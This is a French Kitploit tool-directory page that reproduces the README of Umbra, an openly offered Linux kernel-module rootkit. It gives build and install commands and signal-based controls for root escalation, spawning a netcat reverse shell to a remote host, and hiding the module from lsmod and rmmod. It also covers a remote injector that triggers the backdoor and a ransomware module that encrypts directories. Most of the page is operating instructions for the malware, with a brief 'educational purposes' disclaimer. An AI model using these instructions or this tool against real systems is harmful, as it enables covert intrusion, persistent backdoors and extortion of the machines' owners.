Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Umbra — Un rootkit LKM ciblant les versions de noyau 4.x et 5.x, qui ouvre une porte dérobée pouvant générer un shell inversé vers un hôte distant, exécuter des malwares et plus encore. | Kitploit
Outils/GitHubGitHub/h3xduck/umbra
Escalade de PrivilègesOutils de Chiffrement/DéchiffrementMécanismes de PersistanceÉvasion IDS/IPSPost-ExploitationCommandement et ContrôleApprentissage et ÉducationDéveloppement de Charges UtilesCheval de Troie d'Accès à Distance
GitHubh3xduck/umbra

Umbra

Un rootkit LKM ciblant les versions de noyau 4.x et 5.x, qui ouvre une porte dérobée pouvant générer un shell inversé vers un hôte distant, exécuter des malwares et plus encore.

13627il y a 4 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra est un rootkit LKM expérimental contrôlable à distance pour les noyaux 4.x et 5.x (jusqu'à 5.7) qui ouvre une backdoor réseau pouvant lancer des shells inversés vers des hôtes distants, exécuter des malwares à distance et bien plus encore.

Le rootkit est encore en développement, bien que les fonctionnalités listées ci-dessous soient déjà pleinement opérationnelles.

Backdoor in action

Note : Ce rootkit a été développé et testé avec le noyau 5.4.0 et Ubuntu 18.04.

Fonctionnalités

  • 🌟 Backdoor qui lance un shell inversé vers une IP distante après réception d'un paquet TCP malveillant.
  • 🌟 Utilisez l'Umbra Injector pour contrôler le rootkit à distance :
    • Shell inversé distant.
    • Masquer/afficher le rootkit à distance.
    • Lancer les Umbra Modules.
  • NOUVEAU : Ajout des Umbra Modules, des modules spéciaux de type malware qui améliorent Umbra et peuvent être lancés à distance par l'Umbra Injector.
  • NOUVEAU : Module Umbra « Ransom » qui transforme Umbra en ransomware contrôlable à distance.

Ransom module in action

  • Umbra masque tous ses fichiers et répertoires aux commandes utilisateur telles que ls.
  • Umbra peut se masquer/se rendre visible à distance et localement via des signaux.
  • Élévation de privilèges en envoyant le signal 50.
  • Lance un shell inversé netcat au chargement du module.
  • Lance un shell inversé netcat vers un hôte distant en envoyant le signal 51.

D'autres fonctionnalités arriveront dans les prochaines mises à jour.

Avertissement

Ce rootkit est uniquement à des fins éducatives. Je ne suis pas responsable des dommages résultant d'une utilisation inappropriée.

Gardez également à l'esprit qu'Umbra n'intègre que de légers mécanismes de dissimulation et de protection. Il n'est pas destiné à être utilisé dans un scénario réel.

IMPORTANT : Si vous comptez tester ce rootkit sur votre propre machine, je recommande fortement d'utiliser une VM.

À propos des Umbra Modules : Le module ransom utilise un mécanisme de chiffrement trivial, mais il peut et va certainement chiffrer n'importe quel dossier de votre machine. Bien que les fichiers puissent être facilement déchiffrés, je déconseille vraiment de l'exécuter sur votre dossier racine ou équivalent, sauf dans un environnement contrôlé.

Table des matières

  1. Build and Install
  2. Unloading Umbra
  3. Local Control
  4. Umbra Injector: Remote Control
  5. Umbra Modules
    • (NEW) Ransom
  6. References

Compilation et installation

N'oubliez pas que vous devez disposer d'un noyau 4.x ou 5.x.

  1. Téléchargez vos fichiers d'en-tête du noyau
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. Configurez votre chemin d'inclusion pour couvrir le répertoire des en-têtes du noyau (généralement sous /usr/src). Si vous utilisez vscode, vous pouvez consulter .vscode/c_cpp_properties.json pour un exemple des répertoires à inclure.

  2. Clonez le projet

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Compilez Umbra
root@kitploit:~
make
  1. Chargez Umbra dans le noyau et configurez l'environnement Le script installera Umbra dans le noyau et configurera un répertoire spécial où stocker les modules malveillants. Ce répertoire sera ensuite masqué par le rootkit.
root@kitploit:~
sudo ./install.sh

Si vous avez déjà exécuté le script et souhaitez simplement installer Umbra dans le noyau, vous pouvez lancer :

root@kitploit:~
sudo insmod ./umbra.ko

Déchargement d'Umbra

Assurez-vous qu'Umbra n'est pas en mode invisible, sinon cela échouera.

root@kitploit:~
sudo rmmod umbra

Utilisation de base : contrôle local

Élever les privilèges de l'utilisateur courant à root

  • Envoyez le signal 50 à n'importe quel PID.
root@kitploit:~
kill -50 1

Lancer un shell netcat inversé vers IP:PORT

  • Définissez l'IP et le port souhaités dans CONFIG.H avant de compiler le rootkit. Par défaut 127.0.0.1:5888

  • Commencez à écouter sur l'hôte distant.

root@kitploit:~
nc -lvp 5888
  • Envoyez le signal 51 à n'importe quel PID. Umbra l'interceptera et lancera le shell.
root@kitploit:~
kill -51 1

Note : Umbra tente également de lancer le shell inversé au chargement.

Masquer le rootkit - Mode invisible

Cela empêchera le rootkit d'être affiché par des commandes telles que lsmod, ou d'être supprimé via rmmod.

root@kitploit:~
kill -52 1

Rendre le rootkit visible

Cela annule le mode invisible s'il est actif.

root@kitploit:~
kill -53 1

Umbra Injector : contrôle à distance

Obtenir un shell inversé via la backdoor

L'Umbra Injector peut être exécuté soit avant l'installation d'Umbra (obtenant ainsi le shell une fois celui-ci actif), soit après l'installation d'Umbra sur le système cible.

root@kitploit:~
./injector -S 127.0.0.1

La backdoor écoute les paquets contenant la charge utile suivante : UMBRA_PAYLOAD_GET_REVERSE_SHELL.

Vous pouvez également créer votre propre injecteur en utilisant ma bibliothèque RawTCP.

Masquer le rootkit à distance - Mode invisible

Cela empêchera le rootkit d'être affiché par des commandes telles que lsmod, ou d'être supprimé via rmmod.

root@kitploit:~
./injector -i 127.0.0.1

Rendre le rootkit visible à distance

Cela annule le mode invisible s'il est actif.

root@kitploit:~
./injector -u 127.0.0.1

Aide

Vous pouvez voir toutes les informations sur la façon d'exécuter l'Umbra Injector avec :

root@kitploit:~
./injector -h

Umbra Modules

Les Umbra Modules seront stockés par le script install.sh dans /tmp/umbra, où Umbra les masquera. Le répertoire ne sera pas visible par des commandes telles que ls ou similaires.

Module Ransom

Ce module peut lancer des attaques de type ransomware à distance via l'Umbra Injector. Les fichiers chiffrés apparaissent avec l'extension .ubr.

Actuellement, le mécanisme de chiffrement est un simple NOP au niveau du bit, à titre de preuve de concept. Vous pouvez modifier le module pour y inclure votre propre algorithme de chiffrement.

Chiffrer un répertoire et tous ses sous-répertoires

root@kitploit:~
./injector -p /Your/Path/To/Encrypt -e 127.0.0.1

Déchiffrer un répertoire et tous ses sous-répertoires

root@kitploit:~
./injector -p /Your/Path/To/Decrypt -d 127.0.0.1

Références

Le développement de ce rootkit a impliqué une quantité substantielle de recherches sur les LKM et les techniques de rootkit. La liste suivante est une liste incomplète des ressources que j'ai utilisées : Comment créer des LKM :

  • https://sysprog21.github.io/lkmpg/

Référence des appels système Linux :

  • https://syscalls64.paolostivanin.com/

Quelques références sur les rootkits :

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

Licence

Ce projet est sous licence GPLv2. Voir LICENSE

Télécharger l’outil